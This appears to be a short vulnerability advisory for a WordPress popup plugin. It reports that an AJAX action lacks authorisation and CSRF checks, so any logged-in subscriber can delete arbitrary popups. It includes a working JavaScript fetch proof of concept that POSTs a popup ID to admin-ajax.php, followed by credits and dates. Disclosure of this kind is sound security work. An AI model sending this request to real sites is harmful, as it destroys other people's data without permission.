The plugin does not have authorisation and CSRF check in an AJAX action, allowing any authenticated users, such as subscribers to delete arbitrary Popup
fetch('/wordpress/wp-admin/admin-ajax.php?action=delete_popup', {
method: 'POST',headers:{"content-type":"application/x-www-form-urlencoded"},
body: "bid=1",
}).then(response => response.text())
.then(data => console.log(data));
Krzysztof Zając
Krzysztof Zając
Yes
2022-09-05 (about 8 months ago)
2022-09-05 (about 8 months ago)
2022-09-30 (about 7 months ago)